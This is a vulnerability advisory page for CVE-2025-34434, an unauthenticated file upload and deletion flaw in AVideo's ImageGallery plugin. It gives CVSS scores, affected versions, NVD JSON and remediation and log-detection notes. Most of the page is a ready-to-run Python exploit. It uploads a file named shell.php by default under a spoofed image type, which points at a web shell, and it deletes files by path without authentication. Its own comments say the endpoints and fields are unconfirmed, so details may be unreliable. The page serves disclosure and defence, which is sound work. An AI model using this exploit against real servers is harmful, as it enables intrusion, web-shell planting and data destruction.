Security Vulnerability Report
CVE-2025-34434 CVSS 9.1 CRITICAL

CVE-2025-34434

Published: 2025-12-17 20:15:54
Last Modified: 2025-12-19 19:15:51

Description

AVideo versions prior to 20.1 with the ImageGallery plugin enabled is vulnerable to unauthenticated file upload and deletion. Plugin endpoints responsible for managing gallery images fail to enforce authentication checks and do not validate ownership, allowing unauthenticated attackers to upload or delete images associated with any image-based video.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
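AVideo < 20.1 (with ImageGallery plugin enabled). Note that the CPE match criteria in the raw JSON below give versionEndExcluding "20.0", so tooling keyed on the CPE range may treat 20.0 as unaffected even though the description covers every version prior to 20.1.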

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-34434 AVideo ImageGallery Unauthenticated File Upload/Deletion PoC
# Reference: https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion
#
# Reviewer notes:
# - The CVE record classifies this as CWE-306 (missing authentication): the
#   ImageGallery plugin endpoints neither check for a session nor validate
#   ownership of the gallery being modified.
# - The CVE description scopes the impact to gallery images attached to
#   image-based videos. The endpoint paths, form field names and the
#   "arbitrary file" wording used by this script come from this listing and
#   are NOT confirmed against the patch commits referenced in the CVE record.
#   A failed request therefore does not show that a server is patched.
# - Both helpers treat any HTTP 200 as success. A 200 only shows that something
#   answered; confirm the effect server-side (gallery directory contents,
#   application logs) before drawing a conclusion.
# - Remediation per the CVE description: run AVideo 20.1 or later, or disable
#   the ImageGallery plugin. For detection, review web-server access logs for
#   POST requests under /plugin/ImageGallery/ that carry no authenticated
#   session.
import requests
import sys
import argparse

# Placeholder hostname from the original listing; --target overrides it.
TARGET = "http://target-avideo-server.com"


def upload_file(target_url, file_path, filename="shell.php"):
    """Send an unauthenticated multipart upload to the ImageGallery endpoint.

    Reads ``file_path`` from local disk and POSTs it under the name
    ``filename`` without any session cookie or token.

    Returns True when the server answers HTTP 200, False on any other status
    or when an exception is raised (unreadable file, network error, timeout).
    """
    endpoint = f"{target_url}/plugin/ImageGallery/uploadImage.php"
    # Form fields exactly as given in the original listing.
    form = {'videoId': '1', 'galleryId': '1'}
    try:
        with open(file_path, 'rb') as handle:
            # The part is declared as image/jpeg regardless of its name or
            # content. This value is client-controlled, so server-side
            # validation must not rely on it.
            multipart = {'file': (filename, handle, 'image/jpeg')}
            resp = requests.post(endpoint, files=multipart, data=form, timeout=10)
    except Exception as exc:
        print(f"[-] Error uploading file: {exc!s}")
        return False

    if resp.status_code != 200:
        print(f"[-] Upload failed with status: {resp.status_code}")
        return False

    # HTTP 200 is the only success signal checked; it does not confirm that
    # the file was stored.
    print("[+] File uploaded successfully!")
    print(f"[+] Response: {resp.text}")
    return True


def delete_file(target_url, file_path):
    """Send an unauthenticated delete request to the ImageGallery endpoint.

    ``file_path`` is passed through unchanged as the ``file`` form field.

    Returns True when the server answers HTTP 200, False on any other status
    or when an exception is raised (network error, timeout).
    """
    endpoint = f"{target_url}/plugin/ImageGallery/deleteImage.php"
    form = {
        'file': file_path,
        'confirm': '1',
    }
    try:
        resp = requests.post(endpoint, data=form, timeout=10)
    except Exception as exc:
        print(f"[-] Error deleting file: {exc!s}")
        return False

    if resp.status_code != 200:
        print(f"[-] Delete failed with status: {resp.status_code}")
        return False

    # HTTP 200 is the only success signal checked; it does not confirm that
    # anything was removed.
    print("[+] File deleted successfully!")
    print(f"[+] Response: {resp.text}")
    return True


def main():
    """Parse the command line and run the requested upload and/or delete.

    Upload runs before delete when both options are given. With neither
    option the script sends no request. The helpers' boolean results are
    not used, so the exit status does not reflect the outcome.
    """
    cli = argparse.ArgumentParser(description='CVE-2025-34434 PoC')
    cli.add_argument('--target', default=TARGET, help='Target AVideo server URL')
    cli.add_argument('--upload', help='File to upload')
    cli.add_argument('--delete', help='File path to delete')
    cli.add_argument('--filename', default='shell.php', help='Filename for upload')
    opts = cli.parse_args()

    if opts.upload:
        upload_file(opts.target, opts.upload, opts.filename)
    if opts.delete:
        delete_file(opts.target, opts.delete)


if __name__ == "__main__":
    main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34434", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:53.740", "lastModified": "2025-12-19T19:15:50.810", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "AVideo versions prior to 20.1 with the ImageGallery plugin enabled is vulnerable to unauthenticated file upload and deletion. Plugin endpoints responsible for managing gallery images fail to enforce authentication checks and do not validate ownership, allowing unauthenticated attackers to upload or delete images associated with any image-based video."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndExcluding": "20.0", "matchCriteriaId": "383A7EA7-DFBC-4127-981F-552BFD0B3CED"}]}]}], "references": [{"url": "https://chocapikk.com/posts/2025/avideo-security-vulnerabilities/", "source": "[email protected]"}, {"url": "https://github.com/WWBN/AVideo/commit/4a53ab2056", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/commit/c279999cbd", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.vulncheck.com/advisories/avideo-imagegallery-plugin-unauthenticated-file-upload-and-deletion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}